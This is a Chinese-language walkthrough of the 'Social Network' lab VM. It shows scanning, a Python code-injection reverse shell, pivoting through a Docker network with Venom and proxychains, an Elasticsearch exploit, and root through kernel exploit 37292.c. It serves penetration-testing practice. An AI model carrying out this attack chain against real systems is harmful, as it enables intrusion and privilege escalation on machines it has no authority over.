BoredHackerBlog: Social Network
0x01 主机发现
1 | 同一网段的二层主机地址发现 |
data:image/s3,"s3://crabby-images/b15da/b15dacddb2cf42515e7ee8f984d06744c6892f6f" alt="This is an example image"
0x02 端口扫描
1 | sudo nmap -p- 10.0.2.15 |
data:image/s3,"s3://crabby-images/3fb8f/3fb8f3dfc1a71d438355367b28e90bc32e05c153" alt="This is an example image"
0x03 服务发现
1 | sudo nmap -p22,5000 -sV 10.0.2.15 |
data:image/s3,"s3://crabby-images/39465/39465db007e18383f8506cf30412d1e7ff67616c" alt="This is an example image"
0x04 Web页面探查
data:image/s3,"s3://crabby-images/b4fe7/b4fe7be16d18361a68fc3e5dcbdbca5747f42c82" alt="This is an example image"
在线留言板,估计应该是通过js实现的数据添加
0x05 路径爬取
1 | dirsearch -u 10.0.2.15 |
data:image/s3,"s3://crabby-images/1f0b2/1f0b2dcd756e4b8cd1c87692000dcda7f4cd971c" alt="This is an example image"
0x06 代码注入-反弹shell
data:image/s3,"s3://crabby-images/3ab6b/3ab6bd702de8df67dee0172708b5b281a15474da" alt="This is an example image"
从前面可知目标机环境为python,因为无回显 ,直接使用反弹shell试试
1 | #在页面输入 |
1 | 本地开启监听 |
data:image/s3,"s3://crabby-images/557a7/557a7eb12600cbea9062c0bd7a305dc152c14e58" alt="This is an example image"
0x07 内网信息收集
1 | cat Dockerfile |
data:image/s3,"s3://crabby-images/853d0/853d06992349fca6409400c9ec756541603582df" alt="This is an example image"
初步确定为一台docker容器,可运行下面的命令进一步确定
1 | ls /.dockerenv |
0x08 内网穿透
1 | ip a #查看ip地址 |
data:image/s3,"s3://crabby-images/265e7/265e78c3be940ee5a2ffe9b2c3a8ca0b34c9137d" alt="This is an example image"
发现有内网网段思路有很多,列举几种比较常见的:
- 上线msf、生成python二进制打包elf,或是直接生成elf可执行程序
- 上线CS,linux上线CS下次再介绍
由于这里是打靶,不会过于复杂,就写个简单的脚本扫描了
1 | for i in $(seq 1 10); do ping -c 1 172.17.0.$i; done #这里省时就扫少点 |
data:image/s3,"s3://crabby-images/90c91/90c9158f1d53d70e44c83f315114a17aaae950d5" alt="This is an example image"
Venom实现内网穿透:
1 | ./admin_linux_x64 -lport 9999 #kali:服务器端 |
data:image/s3,"s3://crabby-images/b31a2/b31a2cffb2bc5f1d3cf813e5c10478799ded7f61" alt="This is an example image"
1 | python3 -m http.server 80 #开启http服务 |
Venom本机代理设置:
1 | show |
data:image/s3,"s3://crabby-images/648ef/648ef045467dbcf5ffda54eaceeab3297539eb3d" alt="This is an example image"
1 | sudo vi /etc/proxychains4.conf |
data:image/s3,"s3://crabby-images/ca2e5/ca2e5565acf1ec65cdaeeb550d43e9f1c0ac7636" alt="This is an example image"
完成设置后,就能使用kali本机的工具直接对内网主机进行操作,只需在前缀加上proxychains
1 | proxychains nmap -Pn -sT 172.17.0.1 |
data:image/s3,"s3://crabby-images/a0483/a0483178c0c6cc4a7d56a5e763f43f0c5a56baf5" alt="This is an example image"
1 | proxychains nmap -p22,5000 -Pn -sT -sV 172.17.0.1 |
data:image/s3,"s3://crabby-images/e40e0/e40e08bc45a2645643a2a6f7d8f7b62ab4288850" alt="This is an example image"
端口服务跟暴露在外网的一样
通过配置服务器代理后可直接访问内网地址172.17.0.1
data:image/s3,"s3://crabby-images/e77bb/e77bb38efe71b6d0ce6298367162a87d9ed08b44" alt="This is an example image"
可以看出这个内网地址跟暴露在外网的10.0.2.15开启了相同的服务,判断为同一服务
data:image/s3,"s3://crabby-images/7b46c/7b46c542545207f12bb52088157cbc83d823763f" alt="This is an example image"
继续第二个内网IP
1 | proxychains nmap -Pn -sT 172.17.0.2 |
data:image/s3,"s3://crabby-images/af181/af181ff1eab71d601d4b1ac36e82b2dbeed24224" alt="This is an example image"
1 | proxychains nmap -Pn -sT -p 9200 172.17.0.2 |
data:image/s3,"s3://crabby-images/71b5f/71b5fa7d1f399a801810f60c48a0fcb2025e38ae" alt="This is an example image"
0x09 ES漏洞利用
本地寻找漏洞库中的利用代码:
1 | searchsploit Elasticsearch |
data:image/s3,"s3://crabby-images/814e0/814e08670624139c6e17b5bdad9c8ad7083f8e7a" alt="This is an example image"
1 | cp /usr/share/exploitdb/exploits/linux/remote/36337.py . |
data:image/s3,"s3://crabby-images/be06e/be06e49a2f20fd254c3b63eb1498e5d38c48b744" alt="This is an example image"
oh yes !再拿到一个shell,再来一波信息收集,看到有个password进去瞧瞧。
data:image/s3,"s3://crabby-images/0af78/0af78138ef3e2e71827eaaf648b21d0f147b97cd" alt="This is an example image"
拿去解密,得到 john 密码。PS : 其他账号没什么用。
data:image/s3,"s3://crabby-images/e689c/e689cf76464e1e5d1bccdb69b28f13e0414da180" alt="This is an example image"
0x10 本地提权
尝试远程登录服务器,只有 john 用户登得上外网的服务器。
data:image/s3,"s3://crabby-images/f4ca6/f4ca601f50dd3e003b09d98e93ad5c0872ec4874" alt="This is an example image"
不是root权限,查看内核版本为3.13.0-24-generic,这个是比较古老的版本。查找EXP。
1 | searchsploit 3.13 |
data:image/s3,"s3://crabby-images/ee171/ee171552275708cfda7fdf18a5ba59c7046c17d1" alt="This is an example image"
1 | cp /usr/share/exploitdb/exploits/linux/remote/37292.c . |
此处有个坑,查看提权脚本
data:image/s3,"s3://crabby-images/5769d/5769db6ba509ed54af11e73c5d0cfac0a0c78172" alt="This is an example image"
常规做法是编译成可执行文件到目标机上执行,但代码里有继续调用本地库的操作,很显然,基本上目标机上是没有这些库的,所以在这里的思路是,稍稍修改下代码,再把对应库文件上传。
操作如下:
1、把脚本里对ofs-lib.c操作和判断删除
2、把ofs-lib.c和脚本文件上传到目标机完成提权
1 | gcc -o exp 37292.c |
找到本地的ofs-lib.so文件跟 exp 文件一起上传到目标机
data:image/s3,"s3://crabby-images/9e30f/9e30f62ddc162cc8c09fceee6a20636ddf2edebb" alt="This is an example image"
1 | #目标机赋执行权限,完成提权 |